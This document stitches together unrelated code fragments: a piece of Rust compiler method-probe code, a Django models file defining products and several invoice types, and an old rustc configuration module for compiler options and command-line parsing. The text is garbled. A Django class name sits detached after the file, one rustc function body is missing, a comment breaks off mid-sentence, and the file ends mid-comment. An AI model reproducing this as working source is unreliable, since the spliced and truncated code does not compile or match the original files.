Namespace::from(x.kind) == Namespace::Value && dist > 0 && dist <= max_dist }) .collect() } else { self.fcx .associated_item(def_id, name, Namespace::Value) .map_or(Vec::new(), |x| vec![x]) } } else { self.tcx.associated_items(def_id).collect() } } } impl<'tcx> Candidate<'tcx> { fn to_unadjusted_pick(&self) -> Pick<'tcx> { Pick { item: self.item.clone(), kind: match self.kind { InherentImplCandidate(..) => InherentImplPick, ObjectCandidate => ObjectPick, TraitCandidate(_) => TraitPick, WhereClauseCandidate(ref trait_ref) => { // Only trait derived from where-clauses should // appear here, so they should not contain any // inference variables or other artifacts. This // means they are safe to put into the // `WhereClausePick`. assert!( !trait_ref.skip_binder().substs.needs_infer() && !trait_ref.skip_binder().substs.has_placeholders() ); WhereClausePick(trait_ref.clone()) } }, import_ids: self.import_ids.clone(), autoderefs: 0, autoref: None, unsize: None, } } }
{ result = ProbeResult::NoMatch; if let &ty::Predicate::Trait(ref pred) = &o.predicate { possibly_unsatisfied_predicates.push(pred.skip_binder().trait_ref); } }
models.py
from django.db import models from polymorphic.models import PolymorphicModel class Product(models.Model): PAYER_TYPES = [ ('all', 'All'), ('mem', 'Member'), ('org', 'Organization'), ('cus', 'Custom') ] name = models.CharField(max_length=255) #currency = models.CharField(max_length=3, default='EUR', editable=False) price = models.BigIntegerField() payer_type = models.CharField(max_length=3, choices=PAYER_TYPES) class Meta: unique_together = ('name', 'payer_type') class
(models.Model): invoice = models.ForeignKey('Invoice', on_delete=models.CASCADE, related_name='+') product = models.ForeignKey(Product, on_delete=models.PROTECT, related_name='+') number = models.SmallIntegerField() price = models.BigIntegerField(editable=False) class Invoice(models.Model): date = models.DateTimeField() name = models.CharField(max_length=255) products = models.ManyToManyField( Product, through=InvoiceProducts, through_fields=('invoice','product') ) class MemberInvoice(Invoice): payer = models.ForeignKey('member.Member', on_delete=models.PROTECT, related_name='invoices') class MembershipInvoice(MemberInvoice): membership = models.OneToOneField('member.Membership', on_delete=models.PROTECT, related_name='invoice') class AccessInvoice(MemberInvoice): member = models.ForeignKey('member.Member', on_delete=models.PROTECT, related_name='+') class OrganizationInvoice(Invoice): payer = models.ForeignKey('member.Organization', on_delete=models.PROTECT, related_name='invoices') class CustomInvoice(Invoice): payer = models.TextField()
InvoiceProducts
config.rs
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. //! Contains infrastructure for configuring the compiler, including parsing //! command line options. pub use self::EntryFnType::*; pub use self::CrateType::*; pub use self::Passes::*; pub use self::OptLevel::*; pub use self::OutputType::*; pub use self::DebugInfoLevel::*; use session::{early_error, early_warn, Session}; use session::search_paths::SearchPaths; use rustc_back::target::Target; use lint; use metadata::cstore; use syntax::ast; use syntax::ast::{IntTy, UintTy}; use syntax::attr; use syntax::attr::AttrMetaMethods; use syntax::diagnostic::{ColorConfig, Auto, Always, Never, SpanHandler}; use syntax::parse; use syntax::parse::token::InternedString; use syntax::feature_gate::UnstableFeatures; use getopts; use std::collections::HashMap; use std::env; use std::fmt; use std::path::PathBuf; use llvm; pub struct Config { pub target: Target, pub int_type: IntTy, pub uint_type: UintTy, } #[derive(Clone, Copy, PartialEq)] pub enum OptLevel { No, // -O0 Less, // -O1 Default, // -O2 Aggressive // -O3 } #[derive(Clone, Copy, PartialEq)] pub enum DebugInfoLevel { NoDebugInfo, LimitedDebugInfo, FullDebugInfo, } #[derive(Clone, Copy, PartialEq, PartialOrd, Ord, Eq)] pub enum OutputType { OutputTypeBitcode, OutputTypeAssembly, OutputTypeLlvmAssembly, OutputTypeObject, OutputTypeExe, OutputTypeDepInfo, } #[derive(Clone)] pub struct Options { // The crate config requested for the session, which may be combined // with additional crate configurations during the compile process pub crate_types: Vec<CrateType>, pub gc: bool, pub optimize: OptLevel, pub debug_assertions: bool, pub debuginfo: DebugInfoLevel, pub lint_opts: Vec<(String, lint::Level)>, pub lint_cap: Option<lint::Level>, pub describe_lints: bool, pub output_types: Vec<OutputType>, // This was mutable for rustpkg, which updates search paths based on the // parsed code. It remains mutable in case its replacements wants to use // this. pub search_paths: SearchPaths, pub libs: Vec<(String, cstore::NativeLibraryKind)>, pub maybe_sysroot: Option<PathBuf>, pub target_triple: String, // User-specified cfg meta items. The compiler itself will add additional // items to the crate config, and during parsing the entire crate config // will be added to the crate AST node. This should not be used for // anything except building the full crate config prior to parsing. pub cfg: ast::CrateConfig, pub test: bool, pub parse_only: bool, pub no_trans: bool, pub treat_err_as_bug: bool, pub no_analysis: bool, pub debugging_opts: DebuggingOptions, /// Whether to write dependency files. It's (enabled, optional filename). pub write_dependency_info: (bool, Option<PathBuf>), pub prints: Vec<PrintRequest>, pub cg: CodegenOptions, pub color: ColorConfig, pub show_span: Option<String>, pub externs: HashMap<String, Vec<String>>, pub crate_name: Option<String>, /// An optional name to use as the crate for std during std injection, /// written `extern crate std = "name"`. Default to "std". Used by /// out-of-tree drivers. pub alt_std_name: Option<String>, /// Indicates how the compiler should treat unstable features pub unstable_features: UnstableFeatures } #[derive(Clone, PartialEq, Eq)] pub enum PrintRequest { FileNames, Sysroot, CrateName, } pub enum Input { /// Load source from file File(PathBuf), /// The string is the source Str(String) } impl Input { pub fn filestem(&self) -> String { match *self { Input::File(ref ifile) => ifile.file_stem().unwrap() .to_str().unwrap().to_string(), Input::Str(_) => "rust_out".to_string(), } } } #[derive(Clone)] pub struct OutputFilenames { pub out_directory: PathBuf, pub out_filestem: String, pub single_output_file: Option<PathBuf>, pub extra: String, } impl OutputFilenames { pub fn path(&self, flavor: OutputType) -> PathBuf { match self.single_output_file { Some(ref path) => return path.clone(), None => {} } self.temp_path(flavor) } pub fn temp_path(&self, flavor: OutputType) -> PathBuf { let base = self.out_directory.join(&self.filestem()); match flavor { OutputTypeBitcode => base.with_extension("bc"), OutputTypeAssembly => base.with_extension("s"), OutputTypeLlvmAssembly => base.with_extension("ll"), OutputTypeObject => base.with_extension("o"), OutputTypeDepInfo => base.with_extension("d"), OutputTypeExe => base, } } pub fn with_extension(&self, extension: &str) -> PathBuf { self.out_directory.join(&self.filestem()).with_extension(extension) } pub fn filestem(&self) -> String { format!("{}{}", self.out_filestem, self.extra) } } pub fn host_triple() -> &'static str { // Get the host triple out of the build environment. This ensures that our // idea of the host triple is the same as for the set of libraries we've // actually built. We can't just take LLVM's host triple because they // normalize all ix86 architectures to i386. // // Instead of grabbing the host triple (for the current host), we grab (at // compile time) the target triple that this rustc is built with and // calling that (at runtime) the host triple. (option_env!("CFG_COMPILER_HOST_TRIPLE")). expect("CFG_COMPILER_HOST_TRIPLE") } /// Some reasonable defaults pub fn basic_options() -> Options { Options { crate_types: Vec::new(), gc: false, optimize: No, debuginfo: NoDebugInfo, lint_opts: Vec::new(), lint_cap: None, describe_lints: false, output_types: Vec::new(), search_paths: SearchPaths::new(), maybe_sysroot: None, target_triple: host_triple().to_string(), cfg: Vec::new(), test: false, parse_only: false, no_trans: false, treat_err_as_bug: false, no_analysis: false, debugging_opts: basic_debugging_options(), write_dependency_info: (false, None), prints: Vec::new(), cg: basic_codegen_options(), color: Auto, show_span: None, externs: HashMap::new(), crate_name: None, alt_std_name: None, libs: Vec::new(), unstable_features: UnstableFeatures::Disallow, debug_assertions: true, } } // The type of entry function, so // users can have their own entry // functions that don't start a // scheduler #[derive(Copy, Clone, PartialEq)] pub enum EntryFnType { EntryMain, EntryStart, EntryNone, } #[derive(Copy, PartialEq, PartialOrd, Clone, Ord, Eq, Hash, Debug)] pub enum CrateType { CrateTypeExecutable, CrateTypeDylib, CrateTypeRlib, CrateTypeStaticlib, } #[derive(Clone)] pub enum Passes { SomePasses(Vec<String>), AllPasses, } impl Passes { pub fn is_empty(&self) -> bool { match *self { SomePasses(ref v) => v.is_empty(), AllPasses => false, } } } /// Declare a macro that will define all CodegenOptions/DebuggingOptions fields and parsers all /// at once. The goal of this macro is to define an interface that can be /// programmatically used by the option parser in order to initialize the struct /// without hardcoding field names all over the place. /// /// The goal is to invoke this macro once with the correct fields, and then this /// macro generates all necessary code. The main gotcha of this macro is the /// cgsetters module which is a bunch of generated code to parse an option into /// its respective field in the struct. There are a few hand-written parsers for /// parsing specific types of values in this module. macro_rules! options { ($struct_name:ident, $setter_name:ident, $defaultfn:ident, $buildfn:ident, $prefix:expr, $outputname:expr, $stat:ident, $mod_desc:ident, $mod_set:ident, $($opt:ident : $t:ty = ($init:expr, $parse:ident, $desc:expr)),* ,) => ( #[derive(Clone)] pub struct $struct_name { $(pub $opt: $t),* } pub fn $defaultfn() -> $struct_name { $struct_name { $($opt: $init),* } } pub fn $buildfn(matches: &getopts::Matches) -> $struct_name { let mut op = $defaultfn(); for option in matches.opt_strs($prefix) { let mut iter = option.splitn(2, '='); let key = iter.next().unwrap(); let value = iter.next(); let option_to_lookup = key.replace("-", "_"); let mut found = false; for &(candidate, setter, opt_type_desc, _) in $stat { if option_to_lookup != candidate { continue } if !setter(&mut op, value) { match (value, opt_type_desc) { (Some(..), None) => { early_error(&format!("{} option `{}` takes no \ value", $outputname, key)) } (None, Some(type_desc)) => { early_error(&format!("{0} option `{1}` requires \ {2} ({3} {1}=<value>)", $outputname, key, type_desc, $prefix)) } (Some(value), Some(type_desc)) => { early_error(&format!("incorrect value `{}` for {} \ option `{}` - {} was expected", value, $outputname, key, type_desc)) } (None, None) => unreachable!() } } found = true; break; } if !found { early_error(&format!("unknown {} option: `{}`", $outputname, key)); } } return op; } pub type $setter_name = fn(&mut $struct_name, v: Option<&str>) -> bool; pub const $stat: &'static [(&'static str, $setter_name, Option<&'static str>, &'static str)] = &[ $( (stringify!($opt), $mod_set::$opt, $mod_desc::$parse, $desc) ),* ]; #[allow(non_upper_case_globals, dead_code)] mod $mod_desc { pub const parse_bool: Option<&'static str> = None; pub const parse_opt_bool: Option<&'static str> = Some("one of: `y`, `yes`, `on`, `n`, `no`, or `off`"); pub const parse_string: Option<&'static str> = Some("a string"); pub const parse_opt_string: Option<&'static str> = Some("a string"); pub const parse_list: Option<&'static str> = Some("a space-separated list of strings"); pub const parse_opt_list: Option<&'static str> = Some("a space-separated list of strings"); pub const parse_uint: Option<&'static str> = Some("a number"); pub const parse_passes: Option<&'static str> = Some("a space-separated list of passes, or `all`"); pub const parse_opt_uint: Option<&'static str> = Some("a number"); } #[allow(dead_code)] mod $mod_set { use super::{$struct_name, Passes, SomePasses, AllPasses}; $( pub fn $opt(cg: &mut $struct_name, v: Option<&str>) -> bool { $parse(&mut cg.$opt, v) } )* fn parse_bool(slot: &mut bool, v: Option<&str>) -> bool { match v { Some(..) => false, None => { *slot = true; true } } } fn parse_opt_bool(slot: &mut Option<bool>, v: Option<&str>) -> bool { match v { Some(s) => { match s { "n" | "no" | "off" => { *slot = Some(false); } "y" | "yes" | "on" => { *slot = Some(true); } _ => { return false; } } true }, None => { *slot = Some(true); true } } } fn parse_opt_string(slot: &mut Option<String>, v: Option<&str>) -> bool { match v { Some(s) => { *slot = Some(s.to_string()); true }, None => false, } } fn parse_string(slot: &mut String, v: Option<&str>) -> bool { match v { Some(s) => { *slot = s.to_string(); true }, None => false, } } fn parse_list(slot: &mut Vec<String>, v: Option<&str>) -> bool { match v { Some(s) => { for s in s.split_whitespace() { slot.push(s.to_string()); } true }, None => false, } } fn parse_opt_list(slot: &mut Option<Vec<String>>, v: Option<&str>) -> bool { match v { Some(s) => { let v = s.split_whitespace().map(|s| s.to_string()).collect(); *slot = Some(v); true }, None => false, } } fn parse_uint(slot: &mut usize, v: Option<&str>) -> bool { match v.and_then(|s| s.parse().ok()) { Some(i) => { *slot = i; true }, None => false } } fn parse_opt_uint(slot: &mut Option<usize>, v: Option<&str>) -> bool { match v { Some(s) => { *slot = s.parse().ok(); slot.is_some() } None => { *slot = None; true } } } fn parse_passes(slot: &mut Passes, v: Option<&str>) -> bool { match v { Some("all") => { *slot = AllPasses; true } v => { let mut passes = vec!(); if parse_list(&mut passes, v) { *slot = SomePasses(passes); true } else { false } } } } } ) } options! {CodegenOptions, CodegenSetter, basic_codegen_options, build_codegen_options, "C", "codegen", CG_OPTIONS, cg_type_desc, cgsetters, ar: Option<String> = (None, parse_opt_string, "tool to assemble archives with"), linker: Option<String> = (None, parse_opt_string, "system linker to link outputs with"), link_args: Option<Vec<String>> = (None, parse_opt_list, "extra arguments to pass to the linker (space separated)"), lto: bool = (false, parse_bool, "perform LLVM link-time optimizations"), target_cpu: Option<String> = (None, parse_opt_string, "select target processor (llc -mcpu=help for details)"), target_feature: String = ("".to_string(), parse_string, "target specific attributes (llc -mattr=help for details)"), passes: Vec<String> = (Vec::new(), parse_list, "a list of extra LLVM passes to run (space separated)"), llvm_args: Vec<String> = (Vec::new(), parse_list, "a list of arguments to pass to llvm (space separated)"), save_temps: bool = (false, parse_bool, "save all temporary output files during compilation"), rpath: bool = (false, parse_bool, "set rpath values in libs/exes"), no_prepopulate_passes: bool = (false, parse_bool, "don't pre-populate the pass manager with a list of passes"), no_vectorize_loops: bool = (false, parse_bool, "don't run the loop vectorization optimization passes"), no_vectorize_slp: bool = (false, parse_bool, "don't run LLVM's SLP vectorization pass"), soft_float: bool = (false, parse_bool, "generate software floating point library calls"), prefer_dynamic: bool = (false, parse_bool, "prefer dynamic linking to static linking"), no_integrated_as: bool = (false, parse_bool, "use an external assembler rather than LLVM's integrated one"), no_redzone: Option<bool> = (None, parse_opt_bool, "disable the use of the redzone"), relocation_model: Option<String> = (None, parse_opt_string, "choose the relocation model to use (llc -relocation-model for details)"), code_model: Option<String> = (None, parse_opt_string, "choose the code model to use (llc -code-model for details)"), metadata: Vec<String> = (Vec::new(), parse_list, "metadata to mangle symbol names with"), extra_filename: String = ("".to_string(), parse_string, "extra data to put in each output filename"), codegen_units: usize = (1, parse_uint, "divide crate into N units to optimize in parallel"), remark: Passes = (SomePasses(Vec::new()), parse_passes, "print remarks for these optimization passes (space separated, or \"all\")"), no_stack_check: bool = (false, parse_bool, "disable checks for stack exhaustion (a memory-safety hazard!)"), debuginfo: Option<usize> = (None, parse_opt_uint, "debug info emission level, 0 = no debug info, 1 = line tables only, \ 2 = full debug info with variable and type information"), opt_level: Option<usize> = (None, parse_opt_uint, "Optimize with possible levels 0-3"), debug_assertions: Option<bool> = (None, parse_opt_bool, "explicitly enable the cfg(debug_assertions) directive"), } options! {DebuggingOptions, DebuggingSetter, basic_debugging_options, build_debugging_options, "Z", "debugging", DB_OPTIONS, db_type_desc, dbsetters, verbose: bool = (false, parse_bool, "in general, enable more debug printouts"), time_passes: bool = (false, parse_bool, "measure time of each rustc pass"), count_llvm_insns: bool = (false, parse_bool, "count where LLVM instrs originate"), time_llvm_passes: bool = (false, parse_bool, "measure time of each LLVM pass"), trans_stats: bool = (false, parse_bool, "gather trans statistics"), asm_comments: bool = (false, parse_bool, "generate comments into the assembly (may change behavior)"), no_verify: bool = (false, parse_bool, "skip LLVM verification"), borrowck_stats: bool = (false, parse_bool, "gather borrowck statistics"), no_landing_pads: bool = (false, parse_bool, "omit landing pads for unwinding"), debug_llvm: bool = (false, parse_bool, "enable debug output from LLVM"), count_type_sizes: bool = (false, parse_bool, "count the sizes of aggregate types"), meta_stats: bool = (false, parse_bool, "gather metadata statistics"), print_link_args: bool = (false, parse_bool, "Print the arguments passed to the linker"), gc: bool = (false, parse_bool, "Garbage collect shared data (experimental)"), print_llvm_passes: bool = (false, parse_bool, "Prints the llvm optimization passes being run"), ast_json: bool = (false, parse_bool, "Print the AST as JSON and halt"), ast_json_noexpand: bool = (false, parse_bool, "Print the pre-expansion AST as JSON and halt"), ls: bool = (false, parse_bool, "List the symbols defined by a library crate"), save_analysis: bool = (false, parse_bool, "Write syntax and type analysis information in addition to normal output"), print_move_fragments: bool = (false, parse_bool, "Print out move-fragment data for every fn"), flowgraph_print_loans: bool = (false, parse_bool, "Include loan analysis data in --pretty flowgraph output"), flowgraph_print_moves: bool = (false, parse_bool, "Include move analysis data in --pretty flowgraph output"), flowgraph_print_assigns: bool = (false, parse_bool, "Include assignment analysis data in --pretty flowgraph output"), flowgraph_print_all: bool = (false, parse_bool, "Include all dataflow analysis data in --pretty flowgraph output"), print_region_graph: bool = (false, parse_bool, "Prints region inference graph. \ Use with RUST_REGION_GRAPH=help for more info"), parse_only: bool = (false, parse_bool, "Parse only; do not compile, assemble, or link"), no_trans: bool = (false, parse_bool, "Run all passes except translation; no output"), treat_err_as_bug: bool = (false, parse_bool, "Treat all errors that occur as bugs"), no_analysis: bool = (false, parse_bool, "Parse and expand the source, but run no analysis"), extra_plugins: Vec<String> = (Vec::new(), parse_list, "load extra plugins"), unstable_options: bool = (false, parse_bool, "Adds unstable command line options to rustc interface"), print_enum_sizes: bool = (false, parse_bool, "Print the size of enums and their variants"), force_overflow_checks: Option<bool> = (None, parse_opt_bool, "Force overflow checks on or off"), force_dropflag_checks: Option<bool> = (None, parse_opt_bool, "Force drop flag checks on or off"), trace_macros: bool = (false, parse_bool, "For every macro invocation, print its name and arguments"), disable_nonzeroing_move_hints: bool = (false, parse_bool, "Force nonzeroing move optimization off"), } pub fn default_lib_output() -> CrateType { CrateTypeRlib } pub fn default_configuration(sess: &Session) -> ast::CrateConfig { use syntax::parse::token::intern_and_get_ident as intern; let end = &sess.target.target.target_endian; let arch = &sess.target.target.arch; let wordsz = &sess.target.target.target_pointer_width; let os = &sess.target.target.target_os; let env = &sess.target.target.target_env; let fam = match sess.target.target.options.is_like_windows { true => InternedString::new("windows"), false => InternedString::new("unix") }; let mk = attr::mk_name_value_item_str; let mut ret = vec![ // Target bindings. attr::mk_word_item(fam.clone()), mk(InternedString::new("target_os"), intern(os)), mk(InternedString::new("target_family"), fam), mk(InternedString::new("target_arch"), intern(arch)), mk(InternedString::new("target_endian"), intern(end)), mk(InternedString::new("target_pointer_width"), intern(wordsz)), mk(InternedString::new("target_env"), intern(env)), ]; if sess.opts.debug_assertions { ret.push(attr::mk_word_item(InternedString::new("debug_assertions"))); } return ret; } pub fn append_configuration(cfg: &mut ast::CrateConfig, name: InternedString) { if !cfg.iter().any(|mi| mi.name() == name) { cfg.push(attr::mk_word_item(name)) } } pub fn build_configuration(sess: &Session) -> ast::CrateConfig { // Combine the configuration requested by the session (command line) with // some default and generated configuration items let default_cfg = default_configuration(sess); let mut user_cfg = sess.opts.cfg.clone(); // If the user wants a test runner, then add the test cfg if sess.opts.test { append_configuration(&mut user_cfg, InternedString::new("test")) } let mut v = user_cfg.into_iter().collect::<Vec<_>>(); v.push_all(&default_cfg[..]); v } pub fn build_target_config(opts: &Options, sp: &SpanHandler) -> Config { let target = match Target::search(&opts.target_triple) { Ok(t) => t, Err(e) => { sp.handler().fatal(&format!("Error loading target specification: {}", e)); } }; let (int_type, uint_type) = match &target.target_pointer_width[..] { "32" => (ast::TyI32, ast::TyU32), "64" => (ast::TyI64, ast::TyU64), w => sp.handler().fatal(&format!("target specification was invalid: unrecognized \ target-pointer-width {}", w)) }; Config { target: target, int_type: int_type, uint_type: uint_type, } } /// Returns the "short" subset of the stable rustc command line options. pub fn short_optgroups() -> Vec<getopts::OptGroup> { rustc_short_optgroups().into_iter() .filter(|g|g.is_stable()) .map(|g|g.opt_group) .collect() } /// Returns all of the stable rustc command line options. pub fn optgroups() -> Vec<getopts::OptGroup> { rustc_optgroups().into_iter() .filter(|g|g.is_stable()) .map(|g|g.opt_group) .collect() } #[derive(Copy, Clone, PartialEq, Eq, Debug)] pub enum OptionStability { Stable, Unstable } #[derive(Clone, PartialEq, Eq)] pub struct RustcOptGroup { pub opt_group: getopts::OptGroup, pub stability: OptionStability, } impl RustcOptGroup { pub fn is_stable(&self) -> bool { self.stability == OptionStability::Stable } fn stable(g: getopts::OptGroup) -> RustcOptGroup { RustcOptGroup { opt_group: g, stability: OptionStability::Stable } } fn unstable(g: getopts::OptGroup) -> RustcOptGroup { RustcOptGroup { opt_group: g, stability: OptionStability::Unstable } } } // The `opt` local module holds wrappers around the `getopts` API that // adds extra rustc-specific metadata to each option; such metadata // is exposed by . The public // functions below ending with `_u` are the functions that return // *unstable* options, i.e. options that are only enabled when the // user also passes the `-Z unstable-options` debugging flag. mod opt { // The `fn opt_u` etc below are written so that we can use them // in the future; do not warn about them not being used right now. #![allow(dead_code)] use getopts; use super::RustcOptGroup; pub type R = RustcOptGroup; pub type S<'a> = &'a str; fn stable(g: getopts::OptGroup) -> R { RustcOptGroup::stable(g) } fn unstable(g: getopts::OptGroup) -> R { RustcOptGroup::unstable(g) } // FIXME (pnkfelix): We default to stable since the current set of // options is defacto stable. However, it would be good to revise the // code so that a stable option is the thing that takes extra effort // to encode. pub fn opt(a: S, b: S, c: S, d: S) -> R { stable(getopts::optopt(a, b, c, d)) } pub fn multi(a: S, b: S, c: S, d: S) -> R { stable(getopts::optmulti(a, b, c, d)) } pub fn flag(a: S, b: S, c: S) -> R { stable(getopts::optflag(a, b, c)) } pub fn flagopt(a: S, b: S, c: S, d: S) -> R { stable(getopts::optflagopt(a, b, c, d)) } pub fn flagmulti(a: S, b: S, c: S) -> R { stable(getopts::optflagmulti(a, b, c)) } pub fn opt_u(a: S, b: S, c: S, d: S) -> R
pub fn multi_u(a: S, b: S, c: S, d: S) -> R { unstable(getopts::optmulti(a, b, c, d)) } pub fn flag_u(a: S, b: S, c: S) -> R { unstable(getopts::optflag(a, b, c)) } pub fn flagopt_u(a: S, b: S, c: S, d: S) -> R { unstable(getopts::optflagopt(a, b, c, d)) } pub fn flagmulti_u(a: S, b: S, c: S) -> R { unstable(getopts::optflagmulti(a, b, c)) } } /// Returns the "short" subset of the rustc command line options, /// including metadata for each option, such as whether the option is /// part of the stable long-term interface for rustc. pub fn rustc_short_optgroups() -> Vec<RustcOptGroup> { vec![ opt::flag("h", "help", "Display this message"), opt::multi("", "cfg", "Configure the compilation environment", "SPEC"), opt::multi("L", "", "Add a directory to the library search path", "[KIND=]PATH"), opt::multi("l", "", "Link the generated crate(s) to the specified native library NAME. The optional KIND can be one of, static, dylib, or framework. If omitted, dylib is assumed.", "[KIND=]NAME"), opt::multi("", "crate-type", "Comma separated list of types of crates for the compiler to emit", "[bin|lib|rlib|dylib|staticlib]"), opt::opt("", "crate-name", "Specify the name of the crate being built", "NAME"), opt::multi("", "emit", "Comma separated list of types of output for \ the compiler to emit", "[asm|llvm-bc|llvm-ir|obj|link|dep-info]"), opt::multi("", "print", "Comma separated list of compiler information to \ print on stdout", "[crate-name|file-names|sysroot]"), opt::flagmulti("g", "", "Equivalent to -C debuginfo=2"), opt::flagmulti("O", "", "Equivalent to -C opt-level=2"), opt::opt("o", "", "Write output to <filename>", "FILENAME"), opt::opt("", "out-dir", "Write output to compiler-chosen filename \ in <dir>", "DIR"), opt::opt("", "explain", "Provide a detailed explanation of an error \ message", "OPT"), opt::flag("", "test", "Build a test harness"), opt::opt("", "target", "Target triple cpu-manufacturer-kernel[-os] \ to compile for (see chapter 3.4 of \ http://www.sourceware.org/autobook/ for details)", "TRIPLE"), opt::multi("W", "warn", "Set lint warnings", "OPT"), opt::multi("A", "allow", "Set lint allowed", "OPT"), opt::multi("D", "deny", "Set lint denied", "OPT"), opt::multi("F", "forbid", "Set lint forbidden", "OPT"), opt::multi("", "cap-lints", "Set the most restrictive lint level. \ More restrictive lints are capped at this \ level", "LEVEL"), opt::multi("C", "codegen", "Set a codegen option", "OPT[=VALUE]"), opt::flag("V", "version", "Print version info and exit"), opt::flag("v", "verbose", "Use verbose output"), ] } /// Returns all rustc command line options, including metadata for /// each option, such as whether the option is part of the stable /// long-term interface for rustc. pub fn rustc_optgroups() -> Vec<RustcOptGroup> { let mut opts = rustc_short_optgroups(); opts.push_all(&[ opt::multi("", "extern", "Specify where an external rust library is \ located", "NAME=PATH"), opt::opt("", "sysroot", "Override the system root", "PATH"), opt::multi("Z", "", "Set internal debugging options", "FLAG"), opt::opt("", "color", "Configure coloring of output: auto = colorize, if output goes to a tty (default); always = always colorize output; never = never colorize output", "auto|always|never"), opt::flagopt_u("", "pretty", "Pretty-print the input instead of compiling; valid types are: `normal` (un-annotated source), `expanded` (crates expanded), `typed` (crates expanded, with type annotations), or `expanded,identified` (fully parenthesized, AST nodes with IDs).", "TYPE"), opt::flagopt_u("", "unpretty", "Present the input source, unstable (and less-pretty) variants; valid types are any of the types for `--pretty`, as well as: `flowgraph=<nodeid>` (graphviz formatted flowgraph for node), or `everybody_loops` (all function bodies replaced with `loop {}`).", "TYPE"), opt::opt_u("", "show-span", "Show spans for compiler debugging", "expr|pat|ty"), ]); opts } // Convert strings provided as --cfg [cfgspec] into a crate_cfg pub fn parse_cfgspecs(cfgspecs: Vec<String> ) -> ast::CrateConfig { cfgspecs.into_iter().map(|s| { parse::parse_meta_from_source_str("cfgspec".to_string(), s.to_string(), Vec::new(), &parse::ParseSess::new()) }).collect::<ast::CrateConfig>() } pub fn build_session_options(matches: &getopts::Matches) -> Options { let unparsed_crate_types = matches.opt_strs("crate-type"); let crate_types = parse_crate_types_from_list(unparsed_crate_types) .unwrap_or_else(|e| early_error(&e[..])); let mut lint_opts = vec!(); let mut describe_lints = false; for &level in &[lint::Allow, lint::Warn, lint::Deny, lint::Forbid] { for lint_name in matches.opt_strs(level.as_str()) { if lint_name == "help" { describe_lints = true; } else { lint_opts.push((lint_name.replace("-", "_"), level)); } } } let lint_cap = matches.opt_str("cap-lints").map(|cap| { lint::Level::from_str(&cap).unwrap_or_else(|| { early_error(&format!("unknown lint level: `{}`", cap)) }) }); let debugging_opts = build_debugging_options(matches); let parse_only = debugging_opts.parse_only; let no_trans = debugging_opts.no_trans; let treat_err_as_bug = debugging_opts.treat_err_as_bug; let no_analysis = debugging_opts.no_analysis; if debugging_opts.debug_llvm { unsafe { llvm::LLVMSetDebug(1); } } let mut output_types = Vec::new(); if !debugging_opts.parse_only && !no_trans { let unparsed_output_types = matches.opt_strs("emit"); for unparsed_output_type in &unparsed_output_types { for part in unparsed_output_type.split(',') { let output_type = match part { "asm" => OutputTypeAssembly, "llvm-ir" => OutputTypeLlvmAssembly, "llvm-bc" => OutputTypeBitcode, "obj" => OutputTypeObject, "link" => OutputTypeExe, "dep-info" => OutputTypeDepInfo, _ => { early_error(&format!("unknown emission type: `{}`", part)) } }; output_types.push(output_type) } } }; output_types.sort(); output_types.dedup(); if output_types.is_empty() { output_types.push(OutputTypeExe); } let cg = build_codegen_options(matches); let sysroot_opt = matches.opt_str("sysroot").map(|m| PathBuf::from(&m)); let target = matches.opt_str("target").unwrap_or( host_triple().to_string()); let opt_level = { if matches.opt_present("O") { if cg.opt_level.is_some() { early_error("-O and -C opt-level both provided"); } Default } else { match cg.opt_level { None => No, Some(0) => No, Some(1) => Less, Some(2) => Default, Some(3) => Aggressive, Some(arg) => { early_error(&format!("optimization level needs to be \ between 0-3 (instead was `{}`)", arg)); } } } }; let debug_assertions = cg.debug_assertions.unwrap_or(opt_level == No); let gc = debugging_opts.gc; let debuginfo = if matches.opt_present("g") { if cg.debuginfo.is_some() { early_error("-g and -C debuginfo both provided"); } FullDebugInfo } else { match cg.debuginfo { None | Some(0) => NoDebugInfo, Some(1) => LimitedDebugInfo, Some(2) => FullDebugInfo, Some(arg) => { early_error(&format!("debug info level needs to be between \ 0-2 (instead was `{}`)", arg)); } } }; let mut search_paths = SearchPaths::new(); for s in &matches.opt_strs("L") { search_paths.add_path(&s[..]); } let libs = matches.opt_strs("l").into_iter().map(|s| { let mut parts = s.splitn(2, '='); let kind = parts.next().unwrap(); let (name, kind) = match (parts.next(), kind) { (None, name) | (Some(name), "dylib") => (name, cstore::NativeUnknown), (Some(name), "framework") => (name, cstore::NativeFramework), (Some(name), "static") => (name, cstore::NativeStatic), (_, s) => { early_error(&format!("unknown library kind `{}`, expected \ one of dylib, framework, or static", s)); } }; (name.to_string(), kind) }).collect(); let cfg = parse_cfgspecs(matches.opt_strs("cfg")); let test = matches.opt_present("test"); let write_dependency_info = (output_types.contains(&OutputTypeDepInfo), None); let prints = matches.opt_strs("print").into_iter().map(|s| { match &*s { "crate-name" => PrintRequest::CrateName, "file-names" => PrintRequest::FileNames, "sysroot" => PrintRequest::Sysroot, req => { early_error(&format!("unknown print request `{}`", req)) } } }).collect::<Vec<_>>(); if !cg.remark.is_empty() && debuginfo == NoDebugInfo { early_warn("-C remark will not show source locations without \ --debuginfo"); } let color = match matches.opt_str("color").as_ref().map(|s| &s[..]) { Some("auto") => Auto, Some("always") => Always, Some("never") => Never, None => Auto, Some(arg) => { early_error(&format!("argument for --color must be auto, always \ or never (instead was `{}`)", arg)) } }; let mut externs = HashMap::new(); for arg in &matches.opt_strs("extern") { let mut parts = arg.splitn(2, '='); let name = match parts.next() { Some(s) => s, None => early_error("--extern value must not be empty"), }; let location = match parts.next() { Some(s) => s, None => early_error("--extern value must be of the format `foo=bar`"), }; externs.entry(name.to_string()).or_insert(vec![]).push(location.to_string()); } let crate_name = matches.opt_str("crate-name"); Options { crate_types: crate_types, gc: gc, optimize: opt_level, debuginfo: debuginfo, lint_opts: lint_opts, lint_cap: lint_cap, describe_lints: describe_lints, output_types: output_types, search_paths: search_paths, maybe_sysroot: sysroot_opt, target_triple: target, cfg: cfg, test: test, parse_only: parse_only, no_trans: no_trans, treat_err_as_bug: treat_err_as_bug, no_analysis: no_analysis, debugging_opts: debugging_opts, write_dependency_info: write_dependency_info, prints: prints, cg: cg, color: color, show_span: None, externs: externs, crate_name: crate_name, alt_std_name: None, libs: libs, unstable_features: get_unstable_features_setting(), debug_assertions: debug_assertions, } } pub fn get_unstable_features_setting() -> UnstableFeatures { // 